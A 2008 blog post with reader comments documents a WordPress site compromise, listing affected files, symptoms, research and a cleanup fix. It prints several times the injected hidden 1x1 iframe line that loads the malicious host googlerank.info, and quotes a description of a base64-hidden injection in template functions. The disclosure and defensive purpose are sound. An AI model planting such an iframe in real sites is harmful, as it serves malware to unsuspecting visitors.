WordPress hacked: googlerank.info

Written by Verne on March 6th, 2008

It came to my attention in the last few days that a handful of people had been experiencing some errors when viewing this site. Many visitors had the site return a 404 Page Not Found error page, while others had their browser crash completely. One individual even reported that their anti-virus software had thrown a red flag while visiting this site. My first instinct was that one of the site’s plugins were causing the errors, but upon further investigation, I have found what I believe to be the catalyst: googlerank.info.

Before I begin describing the issue, I want to state that I do not have a permanent fix (though I do have a temporary one). The purpose of this post is to document my findings for anybody who has experienced the symptoms or is interested in helping me find and fix the underlying issue. I’ve found very little documentation on this problem thus far, so I’m hoping to provide some clarity to all others who may be searching for it.

Overview

A hidden <iframe> that points to googlerank.info has been found embedded into a handful of files that are associated with a WordPress installation. The <iframe> always appears at the very bottom of the source code, just before the </body> tag. It is possible that WordPress presents a vulnerability that allows an unauthorized user to access and alter files, thereby compromising the security of the site owner as well as the site’s visitors.

Symptoms

Here are some of the symptoms to look out for:

  • Your site loads for an instant, and quickly redirects to a 404 Page Note Found error page.
  • While your site is loading, your status bar may read “Waiting for http://googlerank.info/…”.
  • Viewing your site on older browsers crashes the browser. This has been mostly reported by users on IE6.
  • Your anti-virus software may detect suspicious activity from your site.

I have not personally experienced the last 2 symptoms, so I unfortunately can’t provide any more details on them. If you’ve experienced any of these symptoms and are able to provide a screenshot or a copy of the error message, please contact me or leave a comment on this post.

Please also note that some of these symptoms occur inconsistently and only for a handful of visitors. I’ve encountered these problems no more than 2 or 3 times myself, but have heard about it enough times from visitors that it concerns me.

Issue

When I first set out to figure out why this site was bringing up errors, the first place I looked was the generated source code (right click > View Source). I slowly went through the syntax line-by-line to see if anything was out of place and discovered this little nugget at the very bottom, right before the </body> tag:

<iframe src=http://googlerank.info width=1 height=1 style=display:none></iframe>

How odd, an embedded hidden <iframe> that was loading a mysterious website called googlerank.info. Diving deeper into the investigation, I discovered that the same line of code was appearing in my WordPress Site Admin as well. As I continued to dig through the files on my server, I found that that there were a handful of other files that had been somehow altered to include the same bit of code.

Here is a complete list of files that the above code appeared in:

  • /wp-admin/admin-footer.php
  • /wp-admin/upload.php
  • /wp-content/themes/yourtheme/footer.php
  • /wp-includes/js/tinymce/blank.htm
  • /wp-includes/js/tinymce/license.htm
  • /wp-includes/js/tinymce/plugins/paste/blank.htm
  • /wp-includes/js/tinymce/plugins/paste/pastetext.htm
  • /wp-includes/js/tinymce/plugins/paste/pasteworld.htm
  • /wp-includes/js/tinymce/themes/advanced/about.htm
  • /wp-includes/js/tinymce/themes/advanced/anchor.htm
  • /wp-includes/js/tinymce/themes/advanced/charmap.htm
  • /wp-includes/js/tinymce/themes/advanced/color_picker.htm
  • /wp-includes/js/tinymce/themes/advanced/image.htm
  • /wp-includes/js/tinymce/themes/advanced/link.htm
  • /wp-includes/js/tinymce/themes/advanced/source_editor.htm

There are likely more, but those are the ones I found after searching for nearly a hour.

googlerank.info

If you visit googlerank.info, you will find an imitation Google error page that says the following:

The requested URL /counter was not found on this server.

The page looks like this:

googlerank.info

However, from time to time, the site won’t load, and instead, you will see this:

Problem loading googlerank.info

Note that Firefox reports that it couldn’t “establish a connection to the server at medicasntred.com”. The URL of the page is also no longer googlerank.info, and instead reads ‘http://medicasntred.com/check/upd.php?t=563′ (it is NOT suggested that you visit this URL). The Whois record for mediasntred.com can be found here.

Research

Doing a quick Google search on the issue returns very few WordPress-related results. However, it seems as though many other open source platforms have been compromised in the same fashion.

Searching the WordPress Support Forums however results in the following thread about WordPress 2.2.2 being hacked. In this thread, snorkelman describes very similar symptoms to those I’ve described above. He even offers a hypothesis for what was causing the issue:

The get_header() and get_footer() functions in general_template.php were modifed. get_header() created a cookie called “yahg”, and get_footer() looked for it. If it found it, it sucked in some code from googlerank.info. The actual line it inserted was hidden by being base64 encoded, but it showed up on the site looking like this:

<iframe src=<http://googlerank.info/counter> style=display:none>

At the time of posting, snorkelman was running WordPress 2.2.2, which was known to be vulnerable and which prompted the WordPress folks to release a critical security update to version 2.3.3. The issue was shrugged off as having been caused by 2.2.2′s vulnerability and the topic was put to rest.

I’ve since resurfaced the thread by posting my situation in hopes that it will alert people that this hack seems to still be active in version 2.3.3.

Findings

From my research and exploration, here are a few things I’ve figured out about this problem:

  • The vulnerability that the hack takes advantage of may have existed in the last few versions of WordPress as I found the code lingering in /wp-includes/js/tinymce/license.htm, which I believe no longer exists in WordPress’ installation, and has been replaced by license.txt instead. However, it could also simply be that the file was left over from past versions and was only altered recently.
  • The hack was performed in the past 3 weeks, as that’s when I last updated the footer.php file of this current theme (as you’ll read below, re-uploading your files gets rid of the unwanted code). This also means that the vulnerability definitely exists in version 2.3.3, and was not simply carried forward from version 2.2.2, as I had done my upgrade when it was first released (which was more than 3 weeks ago).
  • The hack seems to target primarily .htm and .php files that have </body> in them. This is where the code is usually inserted.
  • In response to snorkelman’s hypothesis above, I haven’t found anything in the get_header() function that creates a cookie named “yahg” and that passes it on to the get_footer() function, though that is a scary thought.
  • I cleaned up my files yesterday and the code has not returned thus far. This is good news as it suggests that the code is not self-regenerating.

Solution

As noted at the beginning of this post, I don’t have a permanent fix for this issue. I believe the source of the solution exists within the WordPress code structure itself, which I haven’t looked extensively enough at to be able to diagnose. I do however have a temporary fix, which doesn’t guarantee that the issue will not resurface.

Find out if you’re a victim

First, see if you or your visitors have been experiencing any of the symptoms described above. Next, check the source code of your WordPress site (both the front-end and the back-end/site admin) to see if there is a hidden <iframe> embedded right before your </body> tag. If you see it there, then it’s likely that a number of other files have also been tampered with.

Update your files

The temporary solution to this issue is to simply overwrite the server’s files with your clean files. Follow these steps:

  1. Re-upload your theme’s footer.php file to your theme folder. Make sure that the footer.php file you have doesn’t have the line of code in it (in case you might have downloaded it from the server before).
  2. If you are editing your theme files from the WordPress site admin, go to your Theme Editor (Presentation > Theme Editor) and click on Footer on the right-hand side. Scroll to the bottom of the file and delete the following line of code:
    <iframe src=http://googlerank.info width=1 height=1 style=display:none></iframe>
  3. Download the latest version of WordPress from here.
  4. Copy the /wp-admin/ and /wp-includes/ folders into your server and overwrite the existing files. This will ensure that all your files are clean.

Closing Words

I wrote this post in hopes of bringing some necessary attention to this issue. I’m fairly confident that I’m not the only one who has been affected by this. In fact, I’m pretty sure that many people who have been affected aren’t aware that their site has been compromised.

If you own a WordPress site yourself, I encourage you to do a quick check to make sure you’re clean. If you know others who own WordPress sites, please pass this on to them. If you own a site that has the ability to communicate to a broad audience that this issue may be relevant to, I encourage you to spread the word by writing about this or linking to this post.

Let’s hope we get to the bottom of this and can get a permanent fix in the next version of WordPress!

Update

After some follow-up reading, I found the following article on another individual’s experience with WordPress being hacked. The post was written in November 2007, so the author was definitely using a version of WordPress that preceded 2.3.3. The description of the issue is actually very similar to what snorkelman had described in the WordPress forums (see above). Perhaps my case is an evolution of the same hack or possibly the result of only half of the hack working.

I’ll keep posting updates as I uncover more. Thanks to those who have begun spreading the word already.икони

53 Responses

  • Mike Robinson

    Thanks for the heads up. I don’t seem to have been affected by this but I’ll keep watch on all my WordPress powered sites just in case. Excellent job bringing this all together :)

  • Satish

    Wow, wtf is up with that?

  • adii

    WP 2.3.3 at risk?…

    Verne over at Creative Briefing just dropped me an e-mail to inform me of a vulnerability / potential security flaw he stumbled on in WP 2.3.3… I haven’t noticed anything about this before, but read his documented findings here and check wh…

  • Wp Wordpress » Blog Archive » WP 2.3.3 at risk?

    [...] flaw he stumbled on in WP 2.3.3… I haven’t noticed anything about this before, but read his documented findings here and check whether your blog is being [...]

  • Armen

    This is one thing which bothers me about WordPress; it’s vulnerability. I know nothing about developing a CMS or blogging engine, but Textpattern and Expression Engine seem to have a lot less issues and updates than WordPress.

    However, I’ve never had any problems myself, so I still love it!

  • Ozh

    Armen: the only way for a software not to have vulnerabilities is not to have features. Sure, the popularity of WP brings it to the attention of hackers who find exploits, but the responsive community of unofficial & official coders reacts pretty quick to fix those holes.
    It’s pretty likely that TXP or EE do have vulnerabilities. Not hearing about them is more scary than knowing about those being fixed in WP, in my opinion.

  • Chad

    This is interesting, I was getting visitors telling me that I have a virus on my page(a trojan)

    This was with AVG.. I simply did a quick wordpress update and the file seemed to be ok, a few days later someone sent me a screenshot of McAfee finding the same problem, I run on a mac so I don’t see it, and I can’t seem to find this error. I have a few plug-ins but I don’t think they are the problem.

    I really have absolutely no idea where to start looking, I don’t have any of the iFrames that you spoke about, so I am not sure but thanks for the post its something to think about.

  • Verne

    @ Armen & Ozh – It’s true that not hearing about vulnerabilities can almost be scarier than hearing about them. At least when we know about them we can act to fix them! Also, you’ll usually find that more popular and more widely distributed platforms are the ones that are most targeted by hackers. Who wants to target something that nobody uses anyway (not to say nobody uses TXP or EE)?

    @ Chad – I just did a quick check of your site and my Firefox web developer toolbar is picking up a number of different iframes running (though you could be aware of this). 1 for your actual site, 2 by googlesyndication.com and 2 by pc-futter.com. If you want to shoot me an email maybe I can help you debug it.

  • WPCandy » WordPress 2.3.3 Vulnerabilities?

    [...] If you have been having problems like Verne, he’s posted an article on his blog for a temporary fix to solve this. If you’re interested, check it out here. [...]

  • Ryan

    Thanks for the heads up :)

  • Armen

    Ozh & Verne – Good point. But maybe the fact that WordPress is still structured around PHP4 doesn’t help?

  • milo

    You might block browser access to your wp directory via a .htaccess file.

    Try accessing this folder via the browser :
    address.com/wp-content/plugins/
    to see what I mean.

  • How To: Preparing for WordPress Upgrades

    [...] WordPress 2.5 is due to be released this Monday.   This comes on the heels of a possible vulnerability found with WordPress 2.3.  So, what do you need to do to prepare for a major WordPress [...]

  • Wp Wordpress » Blog Archive » How To: Preparing for WordPress Upgrades

    [...] WordPress 2.5 is due to be released this Monday.   This comes on the heels of a possible vulnerability found with WordPress 2.3.  So, what do you need to do to prepare for a major WordPress [...]

  • Simon

    Hi Verne. Just out of interest, have you contacted your web host? Apart from the fact that it may be in your terms of service to let them know of any malicious activity, it might also help you completely rule out some sort of server hack as opposed to a wordpress hack. Check the FTP access logs for example.

    Apart from that, you may want to try blocking browser access via .htaccess (as suggested above) and/or setting up an automated check to verify the files at regular intervals (write a PHP script to check the sizes of files and compare them to a fresh download, you could cron it and get it to email you if there are any discrepancies). Not fool proof but would catch a fairly simple code injection hack like this.

    As a matter of course you may also want to check any plugins you have installed for known vulnerabilities/updates.

    Good luck, we all feel for you.

  • Faille découverte sur Wordpress 2.3.3 | Le Journal du Blog

    [...] de Creative Breafing vient de découvrir la première faille sur la dernière version de WordPress (2.3.3) It came to my [...]

  • Shanx

    I don’t see any iframes in my WP install, nor on my websites. This problem is associated with either older WP installs that were updated and did not delete some older files that lingered (I started my installs with 2.3.3 svn) or the offending code is a result of some needless plugin or something. The first thing WP noobs should be advised NOT to do is to install plugins for piddly little purposes that are easily handled by a more intelligent php code tweak in their theme.

  • Verne

    @ milo – Thanks for the heads up! I’ve made the adjustments so the directories can’t be viewed.

    @ Simon – I’ve already contacted my host and tried to get the FTP logs. Just waiting on their response back. However, I’m somewhat doubtful that it was a server hack rather than a WordPress hack as I’ve heard about googlerank.info appear in previous WP hack attempts as well. Then again, maybe those cases were victims of server hacks as well. I’ll look into it either way. Thanks for your 2 cents!

    @ Shanx – I think you make a good point about previous files lingering that open up the vulnerabilities of WP. I think I’ll do a fresh update when 2.5 comes out. I have already in the mean time deactivated the majority of the useless plugins on this site and are only running the more trusted ones.

    Thank you to everyone who has helped to share the story thus far, and I’m happy to hear that nobody has been experiencing the same exploits. I’m also glad to hear that 2.5 is due out very shortly (in the next few days perhaps?), so hopefully we can put all these vulnerabilities behind us for at least another short while.

  • milo

    Well, more flaws: your register function is open, some vulnerabilities through the register function were discovered in the past, you may have the hacker sitting in your user panel.

    Looks like you were not very successful with closing all doors, e.g. your readme file is still accessible.

    Blaming a software without securing the entire server and its redundant files might not be the right way.

  • Verne

    Hi milo – I’m not looking to place blame on anything/anyone so much as I’m looking for ways to fix the issue and help others avoid it. Your suggestions are really helpful and I’ll definitely look further into making sure all my loose ends are tied up. Thanks again for your help.

  • Nick

    I visited your site before and it set something off in my Norton, unfortunately I just bounced real quick and didn’t come back. Then i clicked on a link on another site and it landed me back at your site, and as I was reading I realized that it was the same place. Too bad I’m running a new computer that just had the 60 day Norton on it and it ran out four days ago. My new anti-virus didn’t find anything… If anyone has Norton, they are probably the people to find for this. I’m sure if mine detected it, someone elses will.

  • Nick

    Apparently you are aware of my previous finding, i posted it on Adii’s site… http://www.adii.co.za/2008/02/28/working-at-home-make-it-more-interesting/

    you replied to my comment so I guess you know what i was talking about..

  • Verne

    Hi Nick, your comment was actually the initial one that had set me off to explore what was going on with the site. I’ve since been able to identify the problem and fix it, and I haven’t heard of any other issues thus far.

    Thanks for giving the site another chance! Hopefully without the virus alerts it will be a little more welcoming from now on. :)

  • Nick

    Lol. I didn’t mean to give it another chance.. I was scared of your site! Just kidding, I knew it had to be something weird, but when the sirens go off, you normally jump. I can’t wait for the new version… Now I’m skeptical of everyone, I got 2 emails today asking if my site was a ‘website or is it wordpress’. It’s probably nothing, but you never know. Your better off taking off all the logo’s and not letting people register…

  • Verne

    Well I’m happy you found your way back here, even if it was accidental! :) I probably would have been scared too, haha.

    I’m thinking of switching the MyAvatars plugin over to the Gravatars one instead, MyAvatars is too buggy for my liking. And I’ve already disabled registration to minimize the risks.

    WP 2.5 promises great things, so hopefully we can forget all this WP virus crazy talk soon!

  • Tom

    i still use WP 2.2.2. should i be worried?

  • Ward Web Werks» Blog Archive » WordPress hacked: googlerank.info

    [...] browser crash completely. One individual even reported that their anti-virus software had thrown a Read More This entry was written by admin and posted on March 10, 2008 at 2:33 pm and filed under [...]

  • Nuovi attacchi ai blog - Pagina 2 - Forum Per Webmaster - Tutti Per Uno

    [...] di fare injection tramite un iframe, sia nei post che nei commenti. Tra gli altri, trovi info qui. Per chi volesse sapere se la falla ? sfruttata sul proprio blog, basta eseguire una query sql con [...]

  • Order of the Bath » Blog Archive » I wuz hacked

    [...] 3: Creative Briefing has experienced a similar problem using WordPress version 2.3.3 (the current one at 13-Mar-2008). [...]

  • Rick

    Hi Verne, thanks for the link back to my article (curiously it didn’t trackback, I found out by looking at my referrer stats)

    Your new finding bothers me as I really believed I had cracked it by updating WP. I was well behind at the time and now I keep up with every minor release. What is more worrying is that I have no confidence that 2.5 will fix it. If they don’t know about the problem in 2.3.3. then no effort will have been made to correct it in 2.5.

    Also worth nothing is that not only was my blog hacked – this is in the /blog/ subdirectory of my site – but my main index.html page on the root was also modified. This suggests that whatever got in had a good hunt around. It smells of something more fundamental than a simple WP hack, especially if other systems are affected as well. Maybe one of the PHP-admin vulnerabilities that has been going around.

  • Wordpress footer template hacked badly… : Alec Tang - A Developer’s Random Blog

    [...] your WordPress Installation Compromised? Al Gore’s is. WordPress hacked: googlerank.info Are Hackers Exploiting WordPress [...]

  • On Blogging Australia » Blogging tips Current Feature » WordPress 2.3 is falling to bits

    [...] creative briefing has a very thorough post on a related vulnerability (it may be a different ‘exploit’ or means of exploiting the exact same vulnerability that uses a hidden iframe) – if you are at all concerned, I suggest you read it. Tagged as: Exploit, link injection, Security, Vulnerability, WordPress [...]

  • Basic Thinking Blog | Blogvirus

    [...] einfach gehacked die Seite, daher die Warnmeldung. Die Erklärung zu dem Hack findet Ihr auf creativebriefing. Es handelt sich dabei um einen innerhalb eines iframes eingebetteten Links zu einer zweifelhaften [...]

  • Basic Thinking Blog | Blogvirus = hacked II

    [...] 5. Und Hintergrund-Infos zur Infektion via WordPress bei Creative Briefing [...]

  • erdfisch blog

    WordPress infiziert Windows Rechner…

    Deutschlands Vorzeige Alpha-Blogger Robert Basic hatte die gestern einen schwarzen Tag. Sein mit WordPress betriebenes Blog wurde durch eine Sicherheitslücke infiziert und verbreitete einen Virus, der Windows Rechner befallen konnte.

  • soutie

    I encountered a similar problem with my site. Visitors to the site with AVG antivirus indicated that they received a warning about a virus “JS/PSYME.QM” I investigated this and found it to be related to a redirectional script.
    Visitors with Bit Defender AV reported a trojan in my IE temp files.
    I found out that this was caused by a malicious Java Script embeded in the source code of my main index page.

    I began looking at every script tag on my index page and found a script with some I FRAME relatity — I deleted it and updated wordpress to 2.5.1……
    I hope that this works since it has only been one day since —- but is functioning at ths time.

  • koma

    avg, kaspersky and mcafee tells me there is a virus on my page. i just don`t know where to check. i disabled all plugins, erased all sidebar and still got those wornings. help me please

    many 10x

  • milo

    Backup your sql database completely via phpmyadmin or
    the export feature via wp admin,
    then copy your wp-config file (download it to your HD),
    then erase EVERYTHING in the wp folder, everything!
    might be a comprimised file there
    then install the latest wp version with your config file
    then import your sql via phpmyadmin
    or via the wp admin import file

    voila, you have a clean site again.

  • Rick

    … and then change all your passwords as well. Everyone’s.

  • Upgrade Complete, and hopefully now safe from the hacker

    [...] info here and here. On this site it took the form of links added into the template files, and with a display: none; [...]

  • Niyaz

    Well New Versions of WP are out now with more security .. Like People Say until there is the software.. hackers will be too :D

  • FMS GROUP

    Thanks for the heads up :)

  • Rich B

    The bug may have reared it’s ugly head again. Was at a site this morning, no problems, just returned to it and my AVG cut me off with the message of Virus name JS/Psyme.QM as a trojan so someone may have re-introduced it or else upgraded it to get in to the current version of WordPress.

  • iCarly cds

    Crazy what wordpress has involved into

  • Katalogs

    This is interesting

  • John

    I’m running 2.7.2 and AVG just flagged my site. I checked the source and found an iframe. But it wasn’t from tinymce. It was embedded right into my post :S I’ve since updated the post and it seems to be clear. Still a bit worried though.

  • Rick

    Are you sure you haven’t got a hacked copy of WordPress? The latest legitimate version is only 2.7.1.

    But anyway, there are a lot of other ways into web hosting sites now – exploits of PHP, Apache and other stuff so I would check all of those as well.

  • John

    Sorry, I meant 2.7.1.What bothers me is that I had upgraded to the new version recently and only then made the last post (which was one of two that were infected). The second post was made with an older version. Just like before, it was embedded right into the post. Not much info available on this for the new version. Your post was on top when I googled, only noticed the post was old when I started reading.

  • Kevin S

    This week one of the sites I work on was hacked and an iframe was placed in all index.php files, plus in the functions.php file in the wp-includes folder.

    The specfic hack code is:

    This code often overwrites the ending php tags in the file and thus brings the site down.

    I have seen a couple of other threads on this (links at bottom), but not exactly the same code example, so wanted to bring it to light here to:

    * Gauge how often it’s happening
    * Share solutions
    * Expose the culprits, if possible
    * Alert WP team so they can review possible core level security measures

    As to remedies and security measures to take, the other threads have given some good advise, and I plan to sweep my machine and those of other team members with FTP access (could be virus attached to our systems), check recent plugins, scan for virus’ on the hosting servers, and change all relevant security codes and settings. I will report again here, and encourage you to do same.

    For permanent solution read more @ http://annanta.com/?p=338

  • zac

    This happened to one of my sites and it was running 2.9 if not 3! An upgrade to 3.0.1 seems to have cleared it out.

Leave a Reply